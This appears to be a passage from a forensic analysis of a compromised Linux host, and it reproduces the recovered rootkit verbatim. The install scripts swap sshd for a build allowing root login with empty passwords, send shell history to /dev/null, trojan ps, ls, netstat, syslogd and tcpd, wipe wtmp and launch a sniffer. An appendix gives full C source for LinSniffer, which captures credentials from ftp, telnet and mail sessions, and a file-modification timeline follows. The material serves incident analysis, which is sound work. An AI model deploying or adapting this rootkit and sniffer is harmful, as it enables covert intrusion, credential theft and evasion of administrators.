X11DisplayOffset 10

FascistLogging no

PrintMotd yes

KeepAlive yes

SyslogFacility DAEMON

RhostsAuthentication no

RhostsRSAAuthentication yes

RSAAuthentication yes

PasswordAuthentication yes

PermitEmptyPasswords yes

UseLogin no

# CheckMail no

# PidFile /u/zappa/.ssh/pid

# AllowHosts *.our.com friend.other.com

# DenyHosts lowsecurity.theirs.com *.evil.org evil.org

# Umask 022

# SilentDeny yes

hi

rm -rf /usr/sbin/sshd /usr/sbin/sshd1

cp /usr/local/sbin/sshd1 /usr/sbin/sshd

echo "/usr/local/sbin/sshd1" >> /etc/rc.d/rc.local

ps aux | grep sshd | awk '{print "kill -1 "$2""}' > restart-sshd

chmod +x restart-sshd

echo "done installing sshd"

echo "now restarting"

echo "dont forget to remove the sshd folders"

./restart-sshd

 

..............................................................................................................................................................

..............................................................................................................................................................

....................................................................Ci/install-sshd...........................................................................

.........0100755.0001762.0000144.00000002064.07116122235.012563. 0............................................................................................

........ustar  .xrt.............................users.........................................................................................................

.........................................................................................................echo "installing sshd"

gunzip ssh-1.2.27*

tar -xvf ssh-1.2.27*

cd ssh*

make install

rm -rf /etc/sshd_config

cat << hi >> /etc/sshd_config

 

# This is ssh server systemwide configuration file.

 

Port 22

ListenAddress 0.0.0.0

HostKey /etc/ssh_host_key

RandomSeed /etc/ssh_random_seed

ServerKeyBits 768

LoginGraceTime 600

KeyRegenerationInterval 3600

PermitRootLogin yes

IgnoreRhosts no

StrictModes yes

QuietMode yes

X11Forwarding yes

X11DisplayOffset 10

FascistLogging no

PrintMotd yes

KeepAlive yes

SyslogFacility DAEMON

RhostsAuthentication no

RhostsRSAAuthentication yes

RSAAuthentication yes

PasswordAuthentication yes

PermitEmptyPasswords yes

UseLogin no

# CheckMail no

# PidFile /u/zappa/.ssh/pid

# AllowHosts *.our.com friend.other.com

# DenyHosts lowsecurity.theirs.com *.evil.org evil.org

# Umask 022

# SilentDeny yes

hi

echo "/usr/local/sbin/sshd1" >> /etc/rc.d/rc.local

ps aux | grep sshd | awk '{print "kill -1 "$2""}' > restart-sshd

chmod +x restart-sshd

echo "done installing sshd"

echo "now restarting"

echo "dont forget to remove the sshd folders"

./restart-sshd

 

 

..............................................................................................................................................................

..............................................................................................................................................................

.................................................................................................................................................Ci/install-na

med...................................................................................0100755.0001762.0000144.00000000120.07116120705.012675. 0...............

.....................................................................................ustar  .xrt.............................users............................

..............................................................................................................................................................

........................gunzip named.tgz;tar -xvf named.tar

cd bin

./install

cd ..

 

########################################################

rm -rf bin named.tar

..............................................................................................................................................................

..............................................................................................................................................................

.....................................................................................................................Ci/install...............................

..........................................................0100755.0001762.0000144.00000002730.07144535562.011640. 0...........................................

.........................................................ustar  .xrt.............................users........................................................

..........................................................................................................................................................#!/b

in/sh

rm -rf /root/.bash_history

ln -s /dev/null /root/.bash_history

rm -rf /.bash_history

ln -s /dev/null /.bash_history

rm -rf ~games/.bash_history

ln -s /dev/null ~games/.bash_history

rm -rf /tmp/.bash_history

ln -s /dev/null /tmp/.bash_history

rm -rf /usr/games/.bash_history

ln -s /dev/null /usr/games/.bash_history

mkdir backup

cp /bin/ps backup

cp /usr/bin/top backup

cp /usr/sbin/syslogd backup

cp /bin/ls backup

cp /bin/netstat backup

cp /sbin/ifconfig backup

cp /usr/sbin/tcpd backup

echo "Trojaning in progress"

./fix /bin/ps ps

./fix /usr/bin/top top

./fix /usr/sbin/syslogd syslogd

./fix /bin/ls ls

./fix /sbin/ifconfig ifconfig

./fix /bin/netstat netstat

./fix /usr/sbin/tcpd tcpd

./fix /usr/sbin/in.identd in.identd

 

killall -HUP syslogd

./addbd

./snif &

echo "Sniffer ENABLED"

echo "running clean and a.sh"

./clean

./a.sh

mv ptyp /dev

gunzip rpms.tgz;tar -xvf rpms.tar;cd rpms;rpm -Uvh --force *.rpm;cd ..;rm -rf rpms*

killall -1 lpd

rm -rf /var/log/wtmp

cd /var/log

touch wtmp

cd /usr/man/.Ci

rm -rf install addbd

killall -HUP inetd

cp bx /bin/

chmod 755 /bin/bx

rm /usr/sbin/in.ftpd

mv in.ftpd /usr/sbin/

chmod +x /usr/sbin/in.ftpd

echo "done with installing shit"

echo "i'll now run whereis sshd"

echo "if nothing shows up then run ./install-sshd"

echo "if it's in /usr/local/sbin/sshd then run ./install-sshd"

echo "if it's in /usr/sbin/sshd then run ./install-sshd1"

whereis sshd

echo "after successfully installing sshd, run ./do"

echo "rootkit installation complete."

.........................................Ci/snif............................................................................................0100755.0001762.00

00144.00000016075.07116120705.011124. 0....................................................................................................ustar  .xrt........

.....................users....................................................................................................................................

................................................

 

APPENDIX C:  LINSNIFFER

 

/*

LinSniffer 0.03 [BETA]

Mike Edulla

medulla@infosoc.com

*/

 

 

#include <sys/types.h>

#include <sys/socket.h>

#include <sys/time.h>

#include <netinet/in.h>

#include <netdb.h>

#include <string.h>

#include <linux/if.h>

#include <signal.h>

#include <stdio.h>

#include <arpa/inet.h>

#include <linux/socket.h>

#include <linux/ip.h>

#include <linux/tcp.h>

#include <linux/if_ether.h>

 

 

int openintf(char *);

int read_tcp(int);

int filter(void);

int print_header(void);

int print_data(int, char *);

char *hostlookup(unsigned long int);

void clear_victim(void);

void cleanup(int);

 

 

struct etherpacket

{

   struct ethhdr eth;

   struct iphdr  ip;

   struct tcphdr tcp;

   char buff[8192];

}ep;

 

struct

{

   unsigned long      saddr;

   unsigned long      daddr;

   unsigned short     sport;

   unsigned short     dport;

   int                bytes_read;

   char               active;

   time_t             start_time;

} victim;

 

struct iphdr  *ip;

struct tcphdr *tcp;

int s;

FILE *fp;

 

#define CAPTLEN 512

#define TIMEOUT 30

#define TCPLOG "tcp.log"

 

int openintf(char *d)

{

   int fd;

   struct ifreq ifr;

   int s;

   fd=socket(AF_INET, SOCK_PACKET, htons(0x800));

   if(fd < 0)

   {

      perror("cant get SOCK_PACKET socket");

      exit(0);

   }

   strcpy(ifr.ifr_name, d);

   s=ioctl(fd, SIOCGIFFLAGS, &ifr);

   if(s < 0)

   {

      close(fd);

      perror("cant get flags");

      exit(0);

   }

   ifr.ifr_flags |= IFF_PROMISC;

   s=ioctl(fd, SIOCSIFFLAGS, &ifr);

   if(s < 0) perror("cant set promiscuous mode");

   return fd;

}

 

int read_tcp(int s)

{

   int x;

   while(1)

   {

      x=read(s, (struct etherpacket *)&ep, sizeof(ep));

      if(x > 1)

      {

         if(filter()==0) continue;

         x=x-54;

         if(x < 1) continue;

         return x;

      }

   }

}

 

int filter(void)

{

   int p;

   p=0;

   if(ip->protocol != 6) return 0;

   if(victim.active != 0)  

      if(victim.bytes_read > CAPTLEN)

      {

         fprintf(fp, "\n----- [CAPLEN Exceeded]\n");

         clear_victim();

         return 0;

      }

   if(victim.active != 0)

      if(time(NULL) > (victim.start_time + TIMEOUT))

      {

         fprintf(fp, "\n----- [Timed Out]\n");

         clear_victim();

         return 0;

      }                                                                                                                  

   if(ntohs(tcp->dest)==21)  p=1; /* ftp */

   if(ntohs(tcp->dest)==23)  p=1; /* telnet */

   if(ntohs(tcp->dest)==110) p=1; /* pop3 */

   if(ntohs(tcp->dest)==109) p=1; /* pop2 */

   if(ntohs(tcp->dest)==143) p=1; /* imap2 */

   if(ntohs(tcp->dest)==513) p=1; /* rlogin */

   if(ntohs(tcp->dest)==106) p=1; /* poppasswd */

   if(victim.active == 0)

      if(p == 1)

         if(tcp->syn == 1)

         {

            victim.saddr=ip->saddr;

            victim.daddr=ip->daddr;

            victim.active=1;

            victim.sport=tcp->source;

            victim.dport=tcp->dest;

            victim.bytes_read=0;

            victim.start_time=time(NULL);

            print_header();

         } 

   if(tcp->dest != victim.dport) return 0;

   if(tcp->source != victim.sport) return 0;

   if(ip->saddr != victim.saddr) return 0;

   if(ip->daddr != victim.daddr) return 0;

   if(tcp->rst == 1)

   {

      victim.active=0;

      alarm(0);

      fprintf(fp, "\n----- [RST]\n");

      clear_victim();

      return 0;

   }

   if(tcp->fin == 1)

   {

      victim.active=0;

      alarm(0);

      fprintf(fp, "\n----- [FIN]\n");

      clear_victim();

      return 0;

   }

   return 1;

}

 

  

int print_header(void)

{

   fprintf(fp, "\n");

   fprintf(fp, "%s => ", hostlookup(ip->saddr));

   fprintf(fp, "%s [%d]\n", hostlookup(ip->daddr), ntohs(tcp->dest));  

}

 

int print_data(int datalen, char *data)

{

   int i=0;

   int t=0;

  

   victim.bytes_read=victim.bytes_read+datalen;

   for(i=0;i != datalen;i++)

   {

      if(data[i] == 13) { fprintf(fp, "\n"); t=0; }

      if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;}

      if(t > 75) {t=0;fprintf(fp, "\n");}

   }

}

 

 

main(int argc, char **argv)

{

   s=openintf("eth0");

   ip=(struct iphdr *)(((unsigned long)&ep.ip)-2);

   tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2);  

   signal(SIGHUP, SIG_IGN);

   signal(SIGINT, cleanup);

   signal(SIGTERM, cleanup);

   signal(SIGKILL, cleanup);

   signal(SIGQUIT, cleanup);

   if(argc == 2) fp=stdout;

   else fp=fopen(TCPLOG, "at");

   if(fp == NULL) { fprintf(stderr, "cant open log\n");exit(0);}

   clear_victim();

   for(;;)

   {

      read_tcp(s);

      if(victim.active != 0) print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2);

      fflush(fp);     

   }  

}

 

char *hostlookup(unsigned long int in)

{

   static char blah[1024];

   struct in_addr i;

   struct hostent *he;

  

   i.s_addr=in;

   he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET);

   if(he == NULL) strcpy(blah, inet_ntoa(i));

   else strcpy(blah, he->h_name);

   return blah;

}

 

void clear_victim(void)

{

   victim.saddr=0;

   victim.daddr=0;

   victim.sport=0;

   victim.dport=0;

   victim.active=0;

   victim.bytes_read=0;

   victim.start_time=0;

}

 

void cleanup(int sig)

{

   fprintf(fp, "Exiting...\n");

   close(s);

   fclose(fp);

   exit(0);

}

 

 

 

 

APPENDIX D: FILES MODIFIED

 

Nov 06 00 01:00:41     4096 mac -rw-r--r-- root     root     /var/run/ftp.pids-all

Nov 06 00 02:02:00     1024 m.c drwxr-xr-x root     root     /var/lib

                       1024 m.c drwxr-xr-x root     root     /var/spool/anacron

Nov 06 00 02:02:03     4096 m.c drwxr-xr-x root     root     /usr/X11R6/man

                       4096 m.c drwxr-xr-x root     root     /usr/lib/perl5/man

                       4096 m.c drwxr-xr-x root     root     /usr/local/man

                        464 mac -rw-r--r-- root     root     /var/lib/logrotate.status

                          9 m.c -rw------- root     root     /var/spool/anacron/cron.daily

                          0 mac -rw-r--r-- root     root     /usr/X11R6/man/whatis

                          0 mac -rw-r--r-- root     root     /usr/lib/perl5/man/whatis

                          0 mac -rw-r--r-- root     root     /usr/local/man/whatis

                          0 mac -rw-r--r-- root     root     /usr/man/whatis

                       1024 m.c drwxrwxr-x root     uucp     /var/lock

                       1024 ..c drwxrwxrwx xfs      xfs      /tmp/.font-unix

                       1024 m.c drwxr-x--- root     slocate  /var/lib/slocate

                     238767 m.c -rw-r----- root     slocate  /var/lib/slocate/slocate.db

Nov 08 00 06:26:15        0 m.c -rw-r--r-- root     root     /etc/hosts.deny

Nov 08 00 06:51:54      714 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/a.sh

                       7229 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/snif

Nov 08 00 06:51:55      698 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/clean

                     147900 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/inetd

                      12495 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/killall

                      49800 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/pstree

                     133344 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/q

                     132785 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/qs

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd

                        114 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd/a.sh

                      12716 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd/amdx

                      13023 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd/ben

                       1455 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd/ben.c

                      15667 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd/pscan

                       4442 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd/pscan.c

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/bind

                       1760 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/bind/ibind.sh

                       3980 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/bind/pscan.c

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/daemon

                       5907 ..c -rw------- 1010     users    /usr/man/.Ci/scan/daemon/lscan2.c

                      12392 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/daemon/z0ne

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/port

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/port/strobe

                        171 ..c -rw------- 1010     users    /usr/man/.Ci/scan/port/strobe/INSTALL

                       1187 ..c -rw------- 1010     users    /usr/man/.Ci/scan/port/strobe/Makefile

                         17 ..c -rw------- 1010     users    /usr/man/.Ci/scan/port/strobe/VERSION

                       3296 ..c -rw------- 1010     users    /usr/man/.Ci/scan/port/strobe/strobe.1

                      17364 ..c -rw------- 1010     users    /usr/man/.Ci/scan/port/strobe/strobe.c

                      39950 ..c -rw------- 1010     users    /usr/man/.Ci/scan/port/strobe/strobe.services

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/statd

                       4390 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/statd/classb

                      19140 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/statd/r

                      21800 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/statd/statdx

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/wu

                      26676 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/wu/fs

                      37760 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/wu/wu

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/x

                      15092 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/x/pscan

                       3980 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/x/pscan.c

                      17969 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/x/x

                       1259 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/x/xfil

                        385 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/x/xscan

                       3098 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/snap

                       5324 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/sp.pl

                     350996 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/syslogd

Nov 08 00 06:51:56     4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/

                        118 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/ /Anap

                      12408 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/addn

                         83 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/addps

                    1052024 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/bx

                        699 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/chmod-it

                        328 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/do

                     185988 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/find

                      18535 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/fix

                        156 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/needz

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/paki

                       8524 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/paki/slice2

                       6793 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/paki/stream.c

                        188 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/rmS

Nov 08 00 06:52:09        9 m.c lrwxrwxrwx root     root     /.bash_history -> /dev/null

                          9 m.c lrwxrwxrwx root     root     /root/.bash_history -> /dev/null

                          9 m.c lrwxrwxrwx root     root     /tmp/.bash_history -> /dev/null

                       4096 m.c drwxr-xr-x root     root     /usr/games

                          9 mac lrwxrwxrwx root     root     /usr/games/.bash_history -> /dev/null

                       4096 mac drwxr-xr-x root     root     /usr/man/.Ci/backup

                      42736 mac -rwxr-xr-x root     root     /usr/man/.Ci/backup/ifconfig

                      43024 mac -rwxr-xr-x root     root     /usr/man/.Ci/backup/ls

                      66736 mac -rwxr-xr-x root     root     /usr/man/.Ci/backup/netstat

                      60080 mac -r-xr-xr-x root     root     /usr/man/.Ci/backup/ps

                      23568 mac -rwxr-xr-x root     root     /usr/man/.Ci/backup/tcpd

                      34896 mac -r-xr-xr-x root     root     /usr/man/.Ci/backup/top

Nov 08 00 06:52:12     4096 m.c drwxr-xr-x root     root     /usr/man

                        102 mac -rw-r--r-- root     root     /usr/man/.a

                         58 mac -rw-r--r-- root     root     /usr/man/.p

                         58 mac -rw-r--r-- root     root     /usr/man/p

                         61 m.c -rw-r--r-- root     root     /usr/man/r

                          5 mac -rw-r--r-- root     root     /usr/man/.Ci/sniff.pid

                          0 mac -rw-r--r-- root     root     /usr/man/.Ci/tcp.log

Nov 08 00 06:52:15      171 ..c -rw-r--r-- 1010     users    /dev/ptyp

Nov 08 00 06:52:25     1024 ..c drwxr-xr-x root     root     /.automount

                        670 ..c -rw------- root     root     /etc/amd.conf

                        105 ..c -rw-r----- root     root     /etc/amd.net

                        766 ..c -rwxr-xr-x root     root     /etc/rc.d/init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/sysconfig

                         56 ..c -rwxr-xr-x root     root     /etc/sysconfig/amd

                       8024 ..c -rwxr-xr-x root     root     /usr/bin/pawd

                       9084 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/AUTHORS

                       3933 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/BUGS

                     147946 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/ChangeLog

                      23786 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/NEWS

                       3817 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/README

                       4113 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/README.autofs

                       1225 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/README.y2k

                     621985 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/am-utils.ps

                       3201 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/amd.conf-sample

                       4096 m.c drwxr-xr-x root     root     /usr/doc/am-utils-6.0.1s11

                     189318 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/hlfsd.ps

                       3006 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/lostaltmail.conf-sample

                      15625 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-1.gz

                      15324 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-2.gz

                      14152 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-3.gz

                      13984 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-4.gz

                      15354 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-5.gz

                       5011 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-6.gz

                       7086 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-7.gz

                       2954 ..c -rw-r--r-- root     root     /usr/info/am-utils.info.gz

                       8192 m.c drwxr-xr-x root     root     /usr/lib

                         15 m.c lrwxrwxrwx root     root     /usr/lib/libamu.so -> libamu.so.2.1.1

                         15 m.c lrwxrwxrwx root     root     /usr/lib/libamu.so.2 -> libamu.so.2.1.1

                      40370 ..c -rwxr-xr-x root     root     /usr/lib/libamu.so.2.1.1

                       3026 ..c -rw-r--r-- root     root     /usr/man/man1/pawd.1

                      19031 ..c -rw-r--r-- root     root     /usr/man/man5/amd.conf.5

                      10003 ..c -rw-r--r-- root     root     /usr/man/man8/amd.8

                       6318 ..c -rw-r--r-- root     root     /usr/man/man8/amq.8

                       3784 ..c -rw-r--r-- root     root     /usr/man/man8/automount2amd.8

                       5453 ..c -rw-r--r-- root     root     /usr/man/man8/fixmount.8

                       2818 ..c -rw-r--r-- root     root     /usr/man/man8/fsinfo.8

                       9641 ..c -rw-r--r-- root     root     /usr/man/man8/hlfsd.8

                       2571 ..c -rw-r--r-- root     root     /usr/man/man8/mk-amd-map.8

                       2806 ..c -rw-r--r-- root     root     /usr/man/man8/wire-test.8

                       1043 ..c -rwxr-xr-x root     root     /usr/sbin/am-eject

                     106640 ..c -rwxr-xr-x root     root     /usr/sbin/amd

                       1392 ..c -rwxr-xr-x root     root     /usr/sbin/amd2ldif

                       1003 ..c -rwxr-xr-x root     root     /usr/sbin/amd2sun

                      13892 ..c -rwxr-xr-x root     root     /usr/sbin/amq

                       2257 ..c -rwxr-xr-x root     root     /usr/sbin/automount2amd

                       2170 ..c -rwxr-xr-x root     root     /usr/sbin/ctl-hlfsd

                       1521 ..c -rwxr-xr-x root     root     /usr/sbin/fix-amd-map

                      10808 ..c -rwxr-xr-x root     root     /usr/sbin/fixmount

                        404 ..c -rwxr-xr-x root     root     /usr/sbin/fixrmtab

                      34784 ..c -rwxr-xr-x root     root     /usr/sbin/fsinfo

                      29656 ..c -rwxr-xr-x root     root     /usr/sbin/hlfsd

                      18412 ..c -rwxr-xr-x root     root     /usr/sbin/lostaltmail

                       7588 ..c -rwxr-xr-x root     root     /usr/sbin/mk-amd-map

                        804 ..c -rwxr-xr-x root     root     /usr/sbin/wait4amd

                        965 ..c -rwxr-xr-x root     root     /usr/sbin/wait4amd2die

                       5140 ..c -rwxr-xr-x root     root     /usr/sbin/wire-test

Nov 08 00 06:52:31    12333 m.c -rw-r--r-- root     root     /etc/ld.so.cache

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc0.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc0.d/K28amd -> ../init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc1.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc1.d/K28amd -> ../init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc2.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc2.d/K28amd -> ../init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc3.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc3.d/K28amd -> ../init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc4.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc4.d/K28amd -> ../init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc5.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc5.d/K28amd -> ../init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc6.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc6.d/K28amd -> ../init.d/amd

Nov 08 00 06:52:32     1176 .ac -rwxr-xr-x root     root     /etc/rc.d/init.d/lpd

                         13 .ac lrwxrwxrwx root     root     /etc/rc.d/rc0.d/K60lpd -> ../init.d/lpd

                         13 .ac lrwxrwxrwx root     root     /etc/rc.d/rc1.d/K60lpd -> ../init.d/lpd

                         13 .ac lrwxrwxrwx root     root     /etc/rc.d/rc2.d/S60lpd -> ../init.d/lpd

                         13 .ac lrwxrwxrwx root     root     /etc/rc.d/rc3.d/S60lpd -> ../init.d/lpd

                         13 .ac lrwxrwxrwx root     root     /etc/rc.d/rc5.d/S60lpd -> ../init.d/lpd

                         13 .ac lrwxrwxrwx root     root     /etc/rc.d/rc6.d/K60lpd -> ../init.d/lpd

                       3564 ..c -r--r--r-- root     root     /etc/screenrc

                       1024 m.c drwxr-xr-x root     root     /etc/skel

                       3394 ..c -rw-r--r-- root     root     /etc/skel/.screenrc

                          4 .ac lrwxrwxrwx root     root     /usr/bin/gmake -> make

                      15816 ..c -r-xr-xr-x root     lp       /usr/bin/lpq

                      15608 ..c -r-xr-xr-x root     lp       /usr/bin/lpr

                      16248 ..c -r-xr-xr-x root     lp       /usr/bin/lprm

                       3656 ..c -rwxr-xr-x root     root     /usr/bin/lptest

                     104316 ..c -rwxr-xr-x root     root     /usr/bin/make

                       4096 m.c drwxr-xr-x root     root     /usr/doc/make-3.77

                      26571 ..c -rw-r--r-- root     root     /usr/doc/make-3.77/NEWS

                       2141 ..c -r--r--r-- root     root     /usr/doc/make-3.77/README

                      14727 ..c -rw-r--r-- root     root     /usr/info/make.info-1.gz

                       1928 ..c -rw-r--r-- root     root     /usr/info/make.info-10.gz

                      15693 ..c -rw-r--r-- root     root     /usr/info/make.info-2.gz

                      15515 ..c -rw-r--r-- root     root     /usr/info/make.info-3.gz

                      15275 ..c -rw-r--r-- root     root     /usr/info/make.info-4.gz

                      15324 ..c -rw-r--r-- root     root     /usr/info/make.info-5.gz

                      15459 ..c -rw-r--r-- root     root     /usr/info/make.info-6.gz

                      14989 ..c -rw-r--r-- root     root     /usr/info/make.info-7.gz

                       5385 ..c -rw-r--r-- root     root     /usr/info/make.info-8.gz

                       7253 ..c -rw-r--r-- root     root     /usr/info/make.info-9.gz

                       2111 .ac -rw-r--r-- root     root     /usr/info/make.info.gz

                       4650 ..c -rwxr-xr-x root     root     /usr/man/man1/lpq.1

                       7458 ..c -rw-r--r-- root     root     /usr/man/man1/lpr.1

                       4633 ..c -rw-r--r-- root     root     /usr/man/man1/lprm.1

                       2861 ..c -rw-r--r-- root     root     /usr/man/man1/lptest.1

                       7598 ..c -rw-r--r-- root     root     /usr/man/man1/make.1

                       7845 ..c -rw-r--r-- root     root     /usr/man/man5/printcap.5

                       5907 ..c -rw-r--r-- root     root     /usr/man/man8/lpc.8

                       7422 ..c -rw-r--r-- root     root     /usr/man/man8/lpd.8

                       3857 ..c -rw-r--r-- root     root     /usr/man/man8/pac.8

                      24104 ..c -rwxr-Sr-x root     lp       /usr/sbin/lpc

                      51740 ..c -rwxr--r-- root     root     /usr/sbin/lpd

                       5140 ..c -rwxr-xr-x root     root     /usr/sbin/lpf

                       9412 ..c -rwxr--r-- root     root     /usr/sbin/pac

                       1024 ..c drwxrwxr-x root     daemon   /var/spool/lpd

Nov 08 00 06:52:33     2048 m.c drwxr-xr-x root     root     /bin

                       1024 m.c drwxr-xr-x root     root     /etc/X11

                       1024 m.c drwxr-xr-x root     root     /etc/X11/applnk/Internet

                       1024 mac drwxr-xr-x root     root     /etc/X11/wmconfig

                        114 ..c -rw-r--r-- root     root     /etc/X11/wmconfig/telnet

                      13281 mac -rw-r--r-- root     root     /etc/info-dir

                       1084 .ac -rwxr-xr-x root     root     /etc/rc.d/init.d/yppasswdd

                       1137 .ac -rwxr-xr-x root     root     /etc/rc.d/init.d/ypserv

                       1398 ..c -rw-r--r-- root     root     /etc/ypserv.conf

                     236468 ..c -rwxr-xr-x root     root     /usr/bin/screen

                      64608 ..c -rwxr-xr-x root     root     /usr/bin/telnet

                       4096 m.c drwxr-xr-x root     root     /usr/doc/screen-3.9.4

                      14081 ..c -rw-r--r-- root     root     /usr/doc/screen-3.9.4/FAQ

                       3619 ..c -rw-r--r-- root     root     /usr/doc/screen-3.9.4/NEWS

                       3437 ..c -rw-r--r-- root     root     /usr/doc/screen-3.9.4/README

                       6447 ..c -rw-r--r-- root     root     /usr/doc/screen-3.9.4/README.DOTSCREEN

                       4096 m.c drwxr-xr-x root     root     /usr/doc/ypserv-1.3.9

                        191 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/BUGS

                      34068 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/ChangeLog

                       6037 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/INSTALL

                       2471 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/NEWS

                       3595 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/README

                        259 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/README.etc

                       2849 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/README.secure

                        286 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/TODO

                        471 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/securenets

                       1398 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/ypserv.conf

                       4096 m.c drwxr-xr-x root     root     /usr/include/rpcsvc

                       7242 ..c -rw-r--r-- root     root     /usr/include/rpcsvc/ypxfrd.x

                       8192 m.c drwxr-xr-x root     root     /usr/info

                      16094 ..c -rw-r--r-- root     root     /usr/info/screen.info-1.gz

                      15113 ..c -rw-r--r-- root     root     /usr/info/screen.info-2.gz

                      16847 ..c -rw-r--r-- root     root     /usr/info/screen.info-3.gz

                      12505 ..c -rw-r--r-- root     root     /usr/info/screen.info-4.gz

                       1978 .ac -rw-r--r-- root     root     /usr/info/screen.info.gz

                       4096 m.c drwxr-xr-x root     root     /usr/lib/yp

                       1361 ..c -rwxr-xr-x root     root     /usr/lib/yp/create_printcap

                      12384 ..c -rwxr-xr-x root     root     /usr/lib/yp/makedbm

                         95 ..c -rwxr-xr-x root     root     /usr/lib/yp/match_printcap

                      10244 ..c -rwxr-xr-x root     root     /usr/lib/yp/mknetid

